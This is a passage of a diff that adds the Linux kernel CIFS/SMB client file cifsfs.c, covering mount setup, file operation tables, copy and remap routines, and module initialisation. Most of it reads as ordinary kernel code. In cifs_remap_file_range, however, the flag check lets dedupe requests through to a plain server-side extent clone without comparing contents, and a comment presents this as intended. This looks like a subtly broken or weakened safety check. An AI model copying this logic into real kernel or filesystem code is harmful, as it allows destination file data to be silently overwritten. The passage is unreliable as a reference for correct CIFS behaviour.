++		cifs_dbg(FYI, "Devname: %s flags: %d\n", old_ctx->UNC, flags);
++	else
++		cifs_info("Attempting to mount %s\n", old_ctx->UNC);
++
++	cifs_sb = kzalloc(sizeof(struct cifs_sb_info), GFP_KERNEL);
++	if (cifs_sb == NULL) {
++		root = ERR_PTR(-ENOMEM);
++		goto out;
++	}
++
++	cifs_sb->ctx = kzalloc(sizeof(struct smb3_fs_context), GFP_KERNEL);
++	if (!cifs_sb->ctx) {
++		root = ERR_PTR(-ENOMEM);
++		goto out;
++	}
++	rc = smb3_fs_context_dup(cifs_sb->ctx, old_ctx);
++	if (rc) {
++		root = ERR_PTR(rc);
++		goto out;
++	}
++
++	rc = cifs_setup_volume_info(cifs_sb->ctx, NULL, NULL);
++	if (rc) {
++		root = ERR_PTR(rc);
++		goto out;
++	}
++
++	rc = cifs_setup_cifs_sb(cifs_sb);
++	if (rc) {
++		root = ERR_PTR(rc);
++		goto out;
++	}
++
++	rc = cifs_mount(cifs_sb, cifs_sb->ctx);
++	if (rc) {
++		if (!(flags & SB_SILENT))
++			cifs_dbg(VFS, "cifs_mount failed w/return code = %d\n",
++				 rc);
++		root = ERR_PTR(rc);
++		goto out;
++	}
++
++	mnt_data.ctx = cifs_sb->ctx;
++	mnt_data.cifs_sb = cifs_sb;
++	mnt_data.flags = flags;
++
++	/* BB should we make this contingent on mount parm? */
++	flags |= SB_NODIRATIME | SB_NOATIME;
++
++	sb = sget(fs_type, cifs_match_super, cifs_set_super, flags, &mnt_data);
++	if (IS_ERR(sb)) {
++		root = ERR_CAST(sb);
++		cifs_umount(cifs_sb);
++		cifs_sb = NULL;
++		goto out;
++	}
++
++	if (sb->s_root) {
++		cifs_dbg(FYI, "Use existing superblock\n");
++		cifs_umount(cifs_sb);
++		cifs_sb = NULL;
++	} else {
++		rc = cifs_read_super(sb);
++		if (rc) {
++			root = ERR_PTR(rc);
++			goto out_super;
++		}
++
++		sb->s_flags |= SB_ACTIVE;
++	}
++
++	root = cifs_get_root(cifs_sb ? cifs_sb->ctx : old_ctx, sb);
++	if (IS_ERR(root))
++		goto out_super;
++
++	if (cifs_sb)
++		cifs_sb->root = dget(root);
++
++	cifs_dbg(FYI, "dentry root is: %p\n", root);
++	return root;
++
++out_super:
++	deactivate_locked_super(sb);
++	return root;
++out:
++	if (cifs_sb) {
++		if (!sb || IS_ERR(sb)) {  /* otherwise kill_sb will handle */
++			kfree(cifs_sb->prepath);
++			smb3_cleanup_fs_context(cifs_sb->ctx);
++			kfree(cifs_sb);
++		}
++	}
++	return root;
++}
++
++
++static ssize_t
++cifs_loose_read_iter(struct kiocb *iocb, struct iov_iter *iter)
++{
++	ssize_t rc;
++	struct inode *inode = file_inode(iocb->ki_filp);
++
++	if (iocb->ki_flags & IOCB_DIRECT)
++		return cifs_user_readv(iocb, iter);
++
++	rc = cifs_revalidate_mapping(inode);
++	if (rc)
++		return rc;
++
++	return generic_file_read_iter(iocb, iter);
++}
++
++static ssize_t cifs_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	ssize_t written;
++	int rc;
++
++	if (iocb->ki_filp->f_flags & O_DIRECT) {
++		written = cifs_user_writev(iocb, from);
++		if (written > 0 && CIFS_CACHE_READ(cinode)) {
++			cifs_zap_mapping(inode);
++			cifs_dbg(FYI,
++				 "Set no oplock for inode=%p after a write operation\n",
++				 inode);
++			cinode->oplock = 0;
++		}
++		return written;
++	}
++
++	written = cifs_get_writer(cinode);
++	if (written)
++		return written;
++
++	written = generic_file_write_iter(iocb, from);
++
++	if (CIFS_CACHE_WRITE(CIFS_I(inode)))
++		goto out;
++
++	rc = filemap_fdatawrite(inode->i_mapping);
++	if (rc)
++		cifs_dbg(FYI, "cifs_file_write_iter: %d rc on %p inode\n",
++			 rc, inode);
++
++out:
++	cifs_put_writer(cinode);
++	return written;
++}
++
++static loff_t cifs_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct cifsFileInfo *cfile = file->private_data;
++	struct cifs_tcon *tcon;
++
++	/*
++	 * whence == SEEK_END || SEEK_DATA || SEEK_HOLE => we must revalidate
++	 * the cached file length
++	 */
++	if (whence != SEEK_SET && whence != SEEK_CUR) {
++		int rc;
++		struct inode *inode = file_inode(file);
++
++		/*
++		 * We need to be sure that all dirty pages are written and the
++		 * server has the newest file length.
++		 */
++		if (!CIFS_CACHE_READ(CIFS_I(inode)) && inode->i_mapping &&
++		    inode->i_mapping->nrpages != 0) {
++			rc = filemap_fdatawait(inode->i_mapping);
++			if (rc) {
++				mapping_set_error(inode->i_mapping, rc);
++				return rc;
++			}
++		}
++		/*
++		 * Some applications poll for the file length in this strange
++		 * way so we must seek to end on non-oplocked files by
++		 * setting the revalidate time to zero.
++		 */
++		CIFS_I(inode)->time = 0;
++
++		rc = cifs_revalidate_file_attr(file);
++		if (rc < 0)
++			return (loff_t)rc;
++	}
++	if (cfile && cfile->tlink) {
++		tcon = tlink_tcon(cfile->tlink);
++		if (tcon->ses->server->ops->llseek)
++			return tcon->ses->server->ops->llseek(file, tcon,
++							      offset, whence);
++	}
++	return generic_file_llseek(file, offset, whence);
++}
++
++static int
++cifs_setlease(struct file *file, long arg, struct file_lock **lease, void **priv)
++{
++	/*
++	 * Note that this is called by vfs setlease with i_lock held to
++	 * protect *lease from going away.
++	 */
++	struct inode *inode = file_inode(file);
++	struct cifsFileInfo *cfile = file->private_data;
++
++	if (!(S_ISREG(inode->i_mode)))
++		return -EINVAL;
++
++	/* Check if file is oplocked if this is request for new lease */
++	if (arg == F_UNLCK ||
++	    ((arg == F_RDLCK) && CIFS_CACHE_READ(CIFS_I(inode))) ||
++	    ((arg == F_WRLCK) && CIFS_CACHE_WRITE(CIFS_I(inode))))
++		return generic_setlease(file, arg, lease, priv);
++	else if (tlink_tcon(cfile->tlink)->local_lease &&
++		 !CIFS_CACHE_READ(CIFS_I(inode)))
++		/*
++		 * If the server claims to support oplock on this file, then we
++		 * still need to check oplock even if the local_lease mount
++		 * option is set, but there are servers which do not support
++		 * oplock for which this mount option may be useful if the user
++		 * knows that the file won't be changed on the server by anyone
++		 * else.
++		 */
++		return generic_setlease(file, arg, lease, priv);
++	else
++		return -EAGAIN;
++}
++
++struct file_system_type cifs_fs_type = {
++	.owner = THIS_MODULE,
++	.name = "cifs",
++	.init_fs_context = smb3_init_fs_context,
++	.parameters = smb3_fs_parameters,
++	.kill_sb = cifs_kill_sb,
++	.fs_flags = FS_RENAME_DOES_D_MOVE,
++};
++MODULE_ALIAS_FS("cifs");
++
++struct file_system_type smb3_fs_type = {
++	.owner = THIS_MODULE,
++	.name = "smb3",
++	.init_fs_context = smb3_init_fs_context,
++	.parameters = smb3_fs_parameters,
++	.kill_sb = cifs_kill_sb,
++	.fs_flags = FS_RENAME_DOES_D_MOVE,
++};
++MODULE_ALIAS_FS("smb3");
++MODULE_ALIAS("smb3");
++
++const struct inode_operations cifs_dir_inode_ops = {
++	.create = cifs_create,
++	.atomic_open = cifs_atomic_open,
++	.lookup = cifs_lookup,
++	.getattr = cifs_getattr,
++	.unlink = cifs_unlink,
++	.link = cifs_hardlink,
++	.mkdir = cifs_mkdir,
++	.rmdir = cifs_rmdir,
++	.rename = cifs_rename2,
++	.permission = cifs_permission,
++	.setattr = cifs_setattr,
++	.symlink = cifs_symlink,
++	.mknod   = cifs_mknod,
++	.listxattr = cifs_listxattr,
++};
++
++const struct inode_operations cifs_file_inode_ops = {
++	.setattr = cifs_setattr,
++	.getattr = cifs_getattr,
++	.permission = cifs_permission,
++	.listxattr = cifs_listxattr,
++	.fiemap = cifs_fiemap,
++};
++
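++/*
++ * get_link: return a copy of the symlink target cached in the inode; the
++ * buffer is freed through the delayed_call once the VFS is done with it.
++ */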
++const char *cifs_get_link(struct dentry *dentry, struct inode *inode,
++			    struct delayed_call *done)
++{
++	char *target_path;
++
++	target_path = kmalloc(PATH_MAX, GFP_KERNEL);
++	if (!target_path)
++		return ERR_PTR(-ENOMEM);
++
++	spin_lock(&inode->i_lock);
++	if (likely(CIFS_I(inode)->symlink_target)) {
++		strscpy(target_path, CIFS_I(inode)->symlink_target, PATH_MAX);
++	} else {
++		kfree(target_path);
++		target_path = ERR_PTR(-EOPNOTSUPP);
++	}
++	spin_unlock(&inode->i_lock);
++
++	if (!IS_ERR(target_path))
++		set_delayed_call(done, kfree_link, target_path);
++
++	return target_path;
++}
++
++const struct inode_operations cifs_symlink_inode_ops = {
++	.get_link = cifs_get_link,
++	.permission = cifs_permission,
++	.listxattr = cifs_listxattr,
++};
++
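++/* remap_file_range (reflink/dedupe): implemented via server-side duplicate extents */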
++static loff_t cifs_remap_file_range(struct file *src_file, loff_t off,
++		struct file *dst_file, loff_t destoff, loff_t len,
++		unsigned int remap_flags)
++{
++	struct inode *src_inode = file_inode(src_file);
++	struct inode *target_inode = file_inode(dst_file);
++	struct cifsFileInfo *smb_file_src = src_file->private_data;
++	struct cifsFileInfo *smb_file_target;
++	struct cifs_tcon *target_tcon;
++	unsigned int xid;
++	int rc;
++
++	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
++		return -EINVAL;
++
++	cifs_dbg(FYI, "clone range\n");
++
++	xid = get_xid();
++
++	if (!src_file->private_data || !dst_file->private_data) {
++		rc = -EBADF;
++		cifs_dbg(VFS, "missing cifsFileInfo on copy range src file\n");
++		goto out;
++	}
++
++	smb_file_target = dst_file->private_data;
++	target_tcon = tlink_tcon(smb_file_target->tlink);
++
++	/*
++	 * Note: the cifs case is easier than btrfs since the server is
++	 * responsible for checking for proper open modes and file type,
++	 * and if it wants the server could even support a copy range
++	 * where source == target.
++	 */
++	lock_two_nondirectories(target_inode, src_inode);
++
++	if (len == 0)
++		len = src_inode->i_size - off;
++
++	cifs_dbg(FYI, "about to flush pages\n");
++	/* should we flush the first and last pages first? */
++	truncate_inode_pages_range(&target_inode->i_data, destoff,
++				   PAGE_ALIGN(destoff + len)-1);
++
++	if (target_tcon->ses->server->ops->duplicate_extents)
++		rc = target_tcon->ses->server->ops->duplicate_extents(xid,
++			smb_file_src, smb_file_target, off, len, destoff);
++	else
++		rc = -EOPNOTSUPP;
++
++	/* force revalidate of size and timestamps of target file now
++	   that target is updated on the server */
++	CIFS_I(target_inode)->time = 0;
++	/* although unlocking in the reverse order from locking is not
++	   strictly necessary here it is a little cleaner to be consistent */
++	unlock_two_nondirectories(src_inode, target_inode);
++out:
++	free_xid(xid);
++	return rc < 0 ? rc : len;
++}
++
++ssize_t cifs_file_copychunk_range(unsigned int xid,
++				struct file *src_file, loff_t off,
++				struct file *dst_file, loff_t destoff,
++				size_t len, unsigned int flags)
++{
++	struct inode *src_inode = file_inode(src_file);
++	struct inode *target_inode = file_inode(dst_file);
++	struct cifsFileInfo *smb_file_src;
++	struct cifsFileInfo *smb_file_target;
++	struct cifs_tcon *src_tcon;
++	struct cifs_tcon *target_tcon;
++	ssize_t rc;
++
++	cifs_dbg(FYI, "copychunk range\n");
++
++	if (!src_file->private_data || !dst_file->private_data) {
++		rc = -EBADF;
++		cifs_dbg(VFS, "missing cifsFileInfo on copy range src file\n");
++		goto out;
++	}
++
++	rc = -EXDEV;
++	smb_file_target = dst_file->private_data;
++	smb_file_src = src_file->private_data;
++	src_tcon = tlink_tcon(smb_file_src->tlink);
++	target_tcon = tlink_tcon(smb_file_target->tlink);
++
++	if (src_tcon->ses != target_tcon->ses) {
++		cifs_dbg(VFS, "source and target of copy not on same server\n");
++		goto out;
++	}
++
++	rc = -EOPNOTSUPP;
++	if (!target_tcon->ses->server->ops->copychunk_range)
++		goto out;
++
++	/*
++	 * Note: the cifs case is easier than btrfs since the server is
++	 * responsible for checking for proper open modes and file type,
++	 * and if it wants the server could even support a copy range
++	 * where source == target.
++	 */
++	lock_two_nondirectories(target_inode, src_inode);
++
++	cifs_dbg(FYI, "about to flush pages\n");
++
++	rc = filemap_write_and_wait_range(src_inode->i_mapping, off,
++					  off + len - 1);
++	if (rc)
++		goto unlock;
++
++	/* should we flush the first and last pages first? */
++	truncate_inode_pages(&target_inode->i_data, 0);
++
++	rc = file_modified(dst_file);
++	if (!rc)
++		rc = target_tcon->ses->server->ops->copychunk_range(xid,
++			smb_file_src, smb_file_target, off, len, destoff);
++
++	file_accessed(src_file);
++
++	/* force revalidate of size and timestamps of target file now
++	 * that target is updated on the server
++	 */
++	CIFS_I(target_inode)->time = 0;
++
++unlock:
++	/* although unlocking in the reverse order from locking is not
++	 * strictly necessary here it is a little cleaner to be consistent
++	 */
++	unlock_two_nondirectories(src_inode, target_inode);
++
++out:
++	return rc;
++}
++
++/*
++ * Directory operations under CIFS/SMB2/SMB3 are synchronous, so fsync()
++ * is a dummy operation.
++ */
++static int cifs_dir_fsync(struct file *file, loff_t start, loff_t end, int datasync)
++{
++	cifs_dbg(FYI, "Sync directory - name: %pD datasync: 0x%x\n",
++		 file, datasync);
++
++	return 0;
++}
++
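++/*
++ * copy_file_range: try a server-side copychunk first; on -EOPNOTSUPP or
++ * -EXDEV fall back to the VFS generic (read/write based) copy.
++ */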
++static ssize_t cifs_copy_file_range(struct file *src_file, loff_t off,
++				struct file *dst_file, loff_t destoff,
++				size_t len, unsigned int flags)
++{
++	unsigned int xid = get_xid();
++	ssize_t rc;
++	struct cifsFileInfo *cfile = dst_file->private_data;
++
++	if (cfile->swapfile) {
++		rc = -EOPNOTSUPP;
++		free_xid(xid);
++		return rc;
++	}
++
++	rc = cifs_file_copychunk_range(xid, src_file, off, dst_file, destoff,
++					len, flags);
++	free_xid(xid);
++
++	if (rc == -EOPNOTSUPP || rc == -EXDEV)
++		rc = generic_copy_file_range(src_file, off, dst_file,
++					     destoff, len, flags);
++	return rc;
++}
++
++const struct file_operations cifs_file_ops = {
++	.read_iter = cifs_loose_read_iter,
++	.write_iter = cifs_file_write_iter,
++	.open = cifs_open,
++	.release = cifs_close,
++	.lock = cifs_lock,
++	.flock = cifs_flock,
++	.fsync = cifs_fsync,
++	.flush = cifs_flush,
++	.mmap  = cifs_file_mmap,
++	.splice_read = generic_file_splice_read,
++	.splice_write = iter_file_splice_write,
++	.llseek = cifs_llseek,
++	.unlocked_ioctl	= cifs_ioctl,
++	.copy_file_range = cifs_copy_file_range,
++	.remap_file_range = cifs_remap_file_range,
++	.setlease = cifs_setlease,
++	.fallocate = cifs_fallocate,
++};
++
++const struct file_operations cifs_file_strict_ops = {
++	.read_iter = cifs_strict_readv,
++	.write_iter = cifs_strict_writev,
++	.open = cifs_open,
++	.release = cifs_close,
++	.lock = cifs_lock,
++	.flock = cifs_flock,
++	.fsync = cifs_strict_fsync,
++	.flush = cifs_flush,
++	.mmap = cifs_file_strict_mmap,
++	.splice_read = generic_file_splice_read,
++	.splice_write = iter_file_splice_write,
++	.llseek = cifs_llseek,
++	.unlocked_ioctl	= cifs_ioctl,
++	.copy_file_range = cifs_copy_file_range,
++	.remap_file_range = cifs_remap_file_range,
++	.setlease = cifs_setlease,
++	.fallocate = cifs_fallocate,
++};
++
++const struct file_operations cifs_file_direct_ops = {
++	.read_iter = cifs_direct_readv,
++	.write_iter = cifs_direct_writev,
++	.open = cifs_open,
++	.release = cifs_close,
++	.lock = cifs_lock,
++	.flock = cifs_flock,
++	.fsync = cifs_fsync,
++	.flush = cifs_flush,
++	.mmap = cifs_file_mmap,
++	.splice_read = generic_file_splice_read,
++	.splice_write = iter_file_splice_write,
++	.unlocked_ioctl  = cifs_ioctl,
++	.copy_file_range = cifs_copy_file_range,
++	.remap_file_range = cifs_remap_file_range,
++	.llseek = cifs_llseek,
++	.setlease = cifs_setlease,
++	.fallocate = cifs_fallocate,
++};
++
++const struct file_operations cifs_file_nobrl_ops = {
++	.read_iter = cifs_loose_read_iter,
++	.write_iter = cifs_file_write_iter,
++	.open = cifs_open,
++	.release = cifs_close,
++	.fsync = cifs_fsync,
++	.flush = cifs_flush,
++	.mmap  = cifs_file_mmap,
++	.splice_read = generic_file_splice_read,
++	.splice_write = iter_file_splice_write,
++	.llseek = cifs_llseek,
++	.unlocked_ioctl	= cifs_ioctl,
++	.copy_file_range = cifs_copy_file_range,
++	.remap_file_range = cifs_remap_file_range,
++	.setlease = cifs_setlease,
++	.fallocate = cifs_fallocate,
++};
++
++const struct file_operations cifs_file_strict_nobrl_ops = {
++	.read_iter = cifs_strict_readv,
++	.write_iter = cifs_strict_writev,
++	.open = cifs_open,
++	.release = cifs_close,
++	.fsync = cifs_strict_fsync,
++	.flush = cifs_flush,
++	.mmap = cifs_file_strict_mmap,
++	.splice_read = generic_file_splice_read,
++	.splice_write = iter_file_splice_write,
++	.llseek = cifs_llseek,
++	.unlocked_ioctl	= cifs_ioctl,
++	.copy_file_range = cifs_copy_file_range,
++	.remap_file_range = cifs_remap_file_range,
++	.setlease = cifs_setlease,
++	.fallocate = cifs_fallocate,
++};
++
++const struct file_operations cifs_file_direct_nobrl_ops = {
++	.read_iter = cifs_direct_readv,
++	.write_iter = cifs_direct_writev,
++	.open = cifs_open,
++	.release = cifs_close,
++	.fsync = cifs_fsync,
++	.flush = cifs_flush,
++	.mmap = cifs_file_mmap,
++	.splice_read = generic_file_splice_read,
++	.splice_write = iter_file_splice_write,
++	.unlocked_ioctl  = cifs_ioctl,
++	.copy_file_range = cifs_copy_file_range,
++	.remap_file_range = cifs_remap_file_range,
++	.llseek = cifs_llseek,
++	.setlease = cifs_setlease,
++	.fallocate = cifs_fallocate,
++};
++
++const struct file_operations cifs_dir_ops = {
++	.iterate_shared = cifs_readdir,
++	.release = cifs_closedir,
++	.read    = generic_read_dir,
++	.unlocked_ioctl  = cifs_ioctl,
++	.copy_file_range = cifs_copy_file_range,
++	.remap_file_range = cifs_remap_file_range,
++	.llseek = generic_file_llseek,
++	.fsync = cifs_dir_fsync,
++};
++
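++/*
++ * Slab constructor: runs once when an object's backing page is first added
++ * to the cache, so only state that must survive alloc/free cycles (the
++ * embedded VFS inode and the lock semaphore) is initialized here.
++ */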
++static void
++cifs_init_once(void *inode)
++{
++	struct cifsInodeInfo *cifsi = inode;
++
++	inode_init_once(&cifsi->netfs.inode);
++	init_rwsem(&cifsi->lock_sem);
++}
++
++static int __init
++cifs_init_inodecache(void)
++{
++	cifs_inode_cachep = kmem_cache_create("cifs_inode_cache",
++					      sizeof(struct cifsInodeInfo),
++					      0, (SLAB_RECLAIM_ACCOUNT|
++						SLAB_MEM_SPREAD|SLAB_ACCOUNT),
++					      cifs_init_once);
++	if (cifs_inode_cachep == NULL)
++		return -ENOMEM;
++
++	return 0;
++}
++
++static void
++cifs_destroy_inodecache(void)
++{
++	/*
++	 * Make sure all delayed rcu free inodes are flushed before we
++	 * destroy cache.
++	 */
++	rcu_barrier();
++	kmem_cache_destroy(cifs_inode_cachep);
++}
++
++static int
++cifs_init_request_bufs(void)
++{
++	/*
++	 * The SMB2 maximum header size is bigger than the CIFS one, so it
++	 * does no harm to allocate a few extra bytes for CIFS.
++	 */
++	size_t max_hdr_size = MAX_SMB2_HDR_SIZE;
++
++	if (CIFSMaxBufSize < 8192) {
++	/* The buffer size can not be smaller than 2 * PATH_MAX since the
++	   maximum Unicode path name has to fit in any SMB/CIFS path based
++	   frame */
++		CIFSMaxBufSize = 8192;
++	} else if (CIFSMaxBufSize > 1024*127) {
++		CIFSMaxBufSize = 1024 * 127;
++	} else {
++		CIFSMaxBufSize &= 0x1FE00; /* Round size to even 512 byte mult*/
++	}
++/*
++	cifs_dbg(VFS, "CIFSMaxBufSize %d 0x%x\n",
++		 CIFSMaxBufSize, CIFSMaxBufSize);
++*/
++	cifs_req_cachep = kmem_cache_create_usercopy("cifs_request",
++					    CIFSMaxBufSize + max_hdr_size, 0,
++					    SLAB_HWCACHE_ALIGN, 0,
++					    CIFSMaxBufSize + max_hdr_size,
++					    NULL);
++	if (cifs_req_cachep == NULL)
++		return -ENOMEM;
++
++	if (cifs_min_rcv < 1)
++		cifs_min_rcv = 1;
++	else if (cifs_min_rcv > 64) {
++		cifs_min_rcv = 64;
++		cifs_dbg(VFS, "cifs_min_rcv set to maximum (64)\n");
++	}
++
++	cifs_req_poolp = mempool_create_slab_pool(cifs_min_rcv,
++						  cifs_req_cachep);
++
++	if (cifs_req_poolp == NULL) {
++		kmem_cache_destroy(cifs_req_cachep);
++		return -ENOMEM;
++	}
++	/* MAX_CIFS_SMALL_BUFFER_SIZE bytes is enough for most SMB responses and
++	almost all handle based requests (but not write responses, nor is it
++	sufficient for path based requests).  A smaller size would have
++	been more efficient (compacting multiple slab items onto one 4k page)
++	for the case in which debugging was on, but this larger size allows
++	more SMBs to use the small buffer alloc and it is still much more
++	efficient to alloc one per page off the slab compared to the 17K
++	(5 page) alloc of large cifs buffers, even when page debugging is on */
++	cifs_sm_req_cachep = kmem_cache_create_usercopy("cifs_small_rq",
++			MAX_CIFS_SMALL_BUFFER_SIZE, 0, SLAB_HWCACHE_ALIGN,
++			0, MAX_CIFS_SMALL_BUFFER_SIZE, NULL);
++	if (cifs_sm_req_cachep == NULL) {
++		mempool_destroy(cifs_req_poolp);
++		kmem_cache_destroy(cifs_req_cachep);
++		return -ENOMEM;
++	}
++
++	if (cifs_min_small < 2)
++		cifs_min_small = 2;
++	else if (cifs_min_small > 256) {
++		cifs_min_small = 256;
++		cifs_dbg(FYI, "cifs_min_small set to maximum (256)\n");
++	}
++
++	cifs_sm_req_poolp = mempool_create_slab_pool(cifs_min_small,
++						     cifs_sm_req_cachep);
++
++	if (cifs_sm_req_poolp == NULL) {
++		mempool_destroy(cifs_req_poolp);
++		kmem_cache_destroy(cifs_req_cachep);
++		kmem_cache_destroy(cifs_sm_req_cachep);
++		return -ENOMEM;
++	}
++
++	return 0;
++}
++
++static void
++cifs_destroy_request_bufs(void)
++{
++	mempool_destroy(cifs_req_poolp);
++	kmem_cache_destroy(cifs_req_cachep);
++	mempool_destroy(cifs_sm_req_poolp);
++	kmem_cache_destroy(cifs_sm_req_cachep);
++}
++
++static int init_mids(void)
++{
++	cifs_mid_cachep = kmem_cache_create("cifs_mpx_ids",
++					    sizeof(struct mid_q_entry), 0,
++					    SLAB_HWCACHE_ALIGN, NULL);
++	if (cifs_mid_cachep == NULL)
++		return -ENOMEM;
++
++	/* 3 is a reasonable minimum number of simultaneous operations */
++	cifs_mid_poolp = mempool_create_slab_pool(3, cifs_mid_cachep);
++	if (cifs_mid_poolp == NULL) {
++		kmem_cache_destroy(cifs_mid_cachep);
++		return -ENOMEM;
++	}
++
++	return 0;
++}
++
++static void destroy_mids(void)
++{
++	mempool_destroy(cifs_mid_poolp);
++	kmem_cache_destroy(cifs_mid_cachep);
++}
++
++static int __init
++init_cifs(void)
++{
++	int rc = 0;
++	cifs_proc_init();
++	INIT_LIST_HEAD(&cifs_tcp_ses_list);
++/*
++ *  Initialize Global counters
++ */
++	atomic_set(&sesInfoAllocCount, 0);
++	atomic_set(&tconInfoAllocCount, 0);
++	atomic_set(&tcpSesNextId, 0);
++	atomic_set(&tcpSesAllocCount, 0);
++	atomic_set(&tcpSesReconnectCount, 0);
++	atomic_set(&tconInfoReconnectCount, 0);
++
++	atomic_set(&buf_alloc_count, 0);
++	atomic_set(&small_buf_alloc_count, 0);
++#ifdef CONFIG_CIFS_STATS2
++	atomic_set(&total_buf_alloc_count, 0);
++	atomic_set(&total_small_buf_alloc_count, 0);
++	if (slow_rsp_threshold < 1)
++		cifs_dbg(FYI, "slow_response_threshold msgs disabled\n");
++	else if (slow_rsp_threshold > 32767)
++		cifs_dbg(VFS,
++		       "slow response threshold set higher than recommended (0 to 32767)\n");
++#endif /* CONFIG_CIFS_STATS2 */
++
++	atomic_set(&mid_count, 0);
++	GlobalCurrentXid = 0;
++	GlobalTotalActiveXid = 0;
++	GlobalMaxActiveXid = 0;
++	spin_lock_init(&cifs_tcp_ses_lock);
++	spin_lock_init(&GlobalMid_Lock);
++
++	cifs_lock_secret = get_random_u32();
++
++	if (cifs_max_pending < 2) {
++		cifs_max_pending = 2;
++		cifs_dbg(FYI, "cifs_max_pending set to min of 2\n");
++	} else if (cifs_max_pending > CIFS_MAX_REQ) {
++		cifs_max_pending = CIFS_MAX_REQ;
++		cifs_dbg(FYI, "cifs_max_pending set to max of %u\n",
++			 CIFS_MAX_REQ);
++	}
++
++	cifsiod_wq = alloc_workqueue("cifsiod", WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
++	if (!cifsiod_wq) {
++		rc = -ENOMEM;
++		goto out_clean_proc;
++	}
++
++	/*
++	 * Consider setting the max_active limit != 0 in the future, maybe to
++	 * min(num_of_cores - 1, 3), so that we don't launch too many worker
++	 * threads; Documentation/core-api/workqueue.rst recommends setting it to 0.
++	 */
++
++	/* WQ_UNBOUND allows decrypt tasks to run on any CPU */
++	decrypt_wq = alloc_workqueue("smb3decryptd",
++				     WQ_UNBOUND|WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
++	if (!decrypt_wq) {
++		rc = -ENOMEM;
++		goto out_destroy_cifsiod_wq;
++	}
++
++	fileinfo_put_wq = alloc_workqueue("cifsfileinfoput",
++				     WQ_UNBOUND|WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
++	if (!fileinfo_put_wq) {
++		rc = -ENOMEM;
++		goto out_destroy_decrypt_wq;
++	}
++
++	cifsoplockd_wq = alloc_workqueue("cifsoplockd",
++					 WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
++	if (!cifsoplockd_wq) {
++		rc = -ENOMEM;
++		goto out_destroy_fileinfo_put_wq;
++	}
++
++	deferredclose_wq = alloc_workqueue("deferredclose",
++					   WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
++	if (!deferredclose_wq) {
++		rc = -ENOMEM;
++		goto out_destroy_cifsoplockd_wq;
++	}
++
++	rc = cifs_init_inodecache();
++	if (rc)
++		goto out_destroy_deferredclose_wq;
++
++	rc = init_mids();
++	if (rc)
++		goto out_destroy_inodecache;
++
++	rc = cifs_init_request_bufs();
++	if (rc)
++		goto out_destroy_mids;
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	rc = dfs_cache_init();
++	if (rc)
++		goto out_destroy_request_bufs;
++#endif /* CONFIG_CIFS_DFS_UPCALL */
++#ifdef CONFIG_CIFS_UPCALL
++	rc = init_cifs_spnego();
++	if (rc)
++		goto out_destroy_dfs_cache;
++#endif /* CONFIG_CIFS_UPCALL */
++#ifdef CONFIG_CIFS_SWN_UPCALL
++	rc = cifs_genl_init();
++	if (rc)
++		goto out_register_key_type;
++#endif /* CONFIG_CIFS_SWN_UPCALL */
++
++	rc = init_cifs_idmap();
++	if (rc)
++		goto out_cifs_swn_init;
++
++	rc = register_filesystem(&cifs_fs_type);
++	if (rc)
++		goto out_init_cifs_idmap;
++
++	rc = register_filesystem(&smb3_fs_type);
++	if (rc) {
++		unregister_filesystem(&cifs_fs_type);
++		goto out_init_cifs_idmap;
++	}
++
++	return 0;
++
++out_init_cifs_idmap:
++	exit_cifs_idmap();
++out_cifs_swn_init:
++#ifdef CONFIG_CIFS_SWN_UPCALL
++	cifs_genl_exit();
++out_register_key_type:
++#endif
++#ifdef CONFIG_CIFS_UPCALL
++	exit_cifs_spnego();
++out_destroy_dfs_cache:
++#endif
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	dfs_cache_destroy();
++out_destroy_request_bufs:
++#endif
++	cifs_destroy_request_bufs();
++out_destroy_mids:
++	destroy_mids();
++out_destroy_inodecache:
++	cifs_destroy_inodecache();
++out_destroy_deferredclose_wq:
++	destroy_workqueue(deferredclose_wq);
++out_destroy_cifsoplockd_wq:
++	destroy_workqueue(cifsoplockd_wq);
++out_destroy_fileinfo_put_wq:
++	destroy_workqueue(fileinfo_put_wq);
++out_destroy_decrypt_wq:
++	destroy_workqueue(decrypt_wq);
++out_destroy_cifsiod_wq:
++	destroy_workqueue(cifsiod_wq);
++out_clean_proc:
++	cifs_proc_clean();
++	return rc;
++}
++
++static void __exit
++exit_cifs(void)
++{
++	cifs_dbg(NOISY, "exit_smb3\n");
++	unregister_filesystem(&cifs_fs_type);
++	unregister_filesystem(&smb3_fs_type);
++	cifs_dfs_release_automount_timer();
++	exit_cifs_idmap();
++#ifdef CONFIG_CIFS_SWN_UPCALL
++	cifs_genl_exit();
++#endif
++#ifdef CONFIG_CIFS_UPCALL
++	exit_cifs_spnego();
++#endif
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	dfs_cache_destroy();
++#endif
++	cifs_destroy_request_bufs();
++	destroy_mids();
++	cifs_destroy_inodecache();
++	destroy_workqueue(deferredclose_wq);
++	destroy_workqueue(cifsoplockd_wq);
++	destroy_workqueue(decrypt_wq);
++	destroy_workqueue(fileinfo_put_wq);
++	destroy_workqueue(cifsiod_wq);
++	cifs_proc_clean();
++}
++
++MODULE_AUTHOR("Steve French");
++MODULE_LICENSE("GPL");	/* combination of LGPL + GPL source behaves as GPL */
++MODULE_DESCRIPTION
++	("VFS to access SMB3 servers e.g. Samba, Macs, Azure and Windows (and "
++	"also older servers complying with the SNIA CIFS Specification)");
++MODULE_VERSION(CIFS_VERSION);
++MODULE_SOFTDEP("ecb");
++MODULE_SOFTDEP("hmac");
++MODULE_SOFTDEP("md5");
++MODULE_SOFTDEP("nls");
++MODULE_SOFTDEP("aes");
++MODULE_SOFTDEP("cmac");
++MODULE_SOFTDEP("sha256");
++MODULE_SOFTDEP("sha512");
++MODULE_SOFTDEP("aead2");
++MODULE_SOFTDEP("ccm");
++MODULE_SOFTDEP("gcm");
++module_init(init_cifs)
++module_exit(exit_cifs)
+diff --git a/fs/smb/client/cifsfs.h b/fs/smb/client/cifsfs.h
+new file mode 100644
+index 0000000000000..b6c38896fb2db
+--- /dev/null
